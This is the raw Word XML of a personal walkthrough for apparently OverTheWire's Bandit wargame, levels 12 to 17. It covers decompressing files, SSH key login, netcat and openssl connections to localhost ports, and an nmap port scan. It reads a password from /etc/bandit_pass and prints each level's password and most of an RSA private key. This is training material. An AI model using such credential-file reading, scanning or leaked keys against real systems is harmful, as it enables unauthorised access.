        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -r data.txt &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E3340" w14:textId="26CE797C" w:rsidR="00035143" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">- Multiple </w:t>
      </w:r>
      <w:r w:rsidR="00035143">
        <w:t xml:space="preserve">instances of: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CBACA3" w14:textId="77777777" w:rsidR="00035143" w:rsidRDefault="00035143" w:rsidP="00035143">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>mv &lt;filename&gt; &lt;new filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AABDF6" w14:textId="526601CA" w:rsidR="00035143" w:rsidRDefault="00035143" w:rsidP="00035143">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d &lt;new filename in .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22464A8E" w14:textId="35F385B2" w:rsidR="00035143" w:rsidRDefault="00035143" w:rsidP="00035143">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>bzip2 -d &lt;new filename in .bz2 &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF3D7B" w14:textId="5F83C95E" w:rsidR="00035143" w:rsidRDefault="00035143" w:rsidP="00035143">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F3A8684" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="13474767" w14:textId="62224002" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308AFEE7" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Reversed hex dump using `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -r`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F61BE81" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">2. Performed 9 extraction operations alternating between </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, bzip2, and tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D64BDB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Used `file` command to identify compression type at each step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F28E71B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2F36A26B" w14:textId="7A91A4BF" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E01B1C5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DB6AD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6325B1BC" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="38205D8E" w14:textId="4591D64B" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Handle multiple compression layers and use file command to identify formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB1DC6A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06254E62" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="627BBBE6" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="27DCD51C" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3723EF5A" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3FE461D0" w14:textId="78832AFC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13 → Level 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37893AAF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="269D286A" w14:textId="7C770A9D" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: ssh (private key authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76242001" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="62ECBABA" w14:textId="772F2475" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Use SSH private key to access next level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC44EDB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3C1206DE" w14:textId="379CC4D1" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `ssh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sshkey.private</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bandit14@localhost -p 2220`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD62A5D" w14:textId="6117AC73" w:rsidR="00035143" w:rsidRDefault="00035143" w:rsidP="00B305D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00035143">
        <w:t>ed /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00035143">
        <w:t>bandit_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A9E4E4A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="462E25FA" w14:textId="2A61DF63" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7373D164" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Found SSH private key file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D34E6E9" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used key-based authentication instead of password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318B3C9B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Accessed `/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bandit_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit14` for password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A0D67B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="46511429" w14:textId="77175861" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7F3CD1" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4CE230" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038E1120" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7C33A940" w14:textId="6E9E4AEF" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Use SSH private keys for authentication and understand key-based access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F0F808" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126A3EE7" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="624D8994" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="35BE0067" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="55224DE7" w14:textId="5B150466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lastRenderedPageBreak/>
        <w:t>Level 14 → Level 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201372A2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="252170EB" w14:textId="23223A43" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF5A677" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="00FFD476" w14:textId="74D4E395" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Connect to localhost port 30000 to retrieve password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7186734E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4E025945" w14:textId="7A49806E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> localhost 30000`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B277AAA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4499BA5A" w14:textId="1D9FFAD6" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588EEC6E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">1. Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to establish TCP connection to port 30000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E111AB7" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Server immediately returned the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713AC7C1" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="770E18E4" w14:textId="0561FE66" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DDE4AD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459AB8CF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB0AFB2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="245118FB" w14:textId="2D670CE5" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Learning: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for basic network connections and port communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56381C70" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E801DC" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="61EC51B3" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4207246E" w14:textId="5056AAD3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15 → Level 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270D7916" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4AEB14C3" w14:textId="25F8B661" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37885987" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="04DF5DF9" w14:textId="38D621ED" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Connect to port 30001 using SSL encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0824C957" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="064CC4B5" w14:textId="000A6F7C" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: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localhost:30001 -quiet`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A230CC6" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3DADEA89" w14:textId="24A61422" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B651B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">1. Established SSL connection using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</w:p>
    <w:p w14:paraId="5432A6C2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Server returned password over secure connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3634342C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0BC251B5" w14:textId="692A8D6B" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C53870" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0112F68F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F898592" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="69D5FFAA" w14:textId="730C293A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Learning: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for secure SSL/TLS connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE08F4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FD8B93" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="45947737" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6BAE5644" w14:textId="27E43E77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16 → Level 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A306504" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4DA01D19" w14:textId="0F3B16C0" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12892F56" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="33E9B542" w14:textId="206E15DB" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find correct SSL port among port range 31000-32000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DB759A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="293B5982" w14:textId="25C5FC1B" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Commands Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E58B6B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p 31000-32000 localhost`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552274BE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>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localhost:31790 -quiet`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635A83B" w14:textId="1EBED958" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nano </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshkey.private</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  //paste the key here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6383B320" w14:textId="73396A8C" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- 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sshkey.private</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25E573F1" w14:textId="0767F120" w:rsidR="00B305D3" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssl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sshkey.private</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bandit17@localhost -p 2220</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E678F" w14:textId="77777777" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813"/>
    <w:p w14:paraId="6E9DB300" w14:textId="4436DEFE" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E8E7A9" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">1. Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to scan port range and identify open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0BFE29" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Connected to SSL-enabled port 31790</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63223479" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Received SSH private key for next level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3243EE09" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>4. Set up key file with proper permissions (`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 600`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F8E35" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="36CF7746" w14:textId="3F350F79" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F812F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABD039" w14:textId="2AF7CD2A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">- SSH Key: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DC011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-----BEGIN RSA PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E0F29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MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D88092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imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC9315C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Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73778BD5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DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C5C6B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JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B26065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x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5028CF44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KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A455F8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J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382E501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d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98565E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YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0236296C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vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama</w:t>
      </w:r>
    </w:p>
